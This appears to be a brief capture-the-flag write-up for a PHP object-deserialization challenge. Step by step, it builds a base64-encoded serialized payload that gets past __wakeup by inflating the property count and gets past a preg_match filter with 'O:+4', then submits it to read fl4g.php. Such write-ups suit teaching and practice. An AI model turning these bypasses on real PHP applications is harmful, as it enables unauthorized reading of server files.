* Step:
 	- get value of $_GET['var']
 	- base64_decode
 	- filter by preg_match
 	- unserizalize object
 	
* Payload need:
	- base64_encode
	- bypass filter
	- bypass unserialize

* hint: flag in file fl4g.php	

* Bypass unserialize:	
- Serialize class Demo:
 	$a = new Demo("fl4g.php);
 	$ser = serialize($a);
	//O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";} 
 
- bypass __wakeup():
	$ser = str_replace(':1:', ':2:', $ser);
	//O:4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}

* Bypass filter preg_match:
	$ser = str_replace('O:4', 'O:+4', $ser);
	//O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}

* Encode base64:
	echo base64_encode($ser)

=> get payload: $payload

=> submit with URL query var: host?var=$payload

=> Got flag





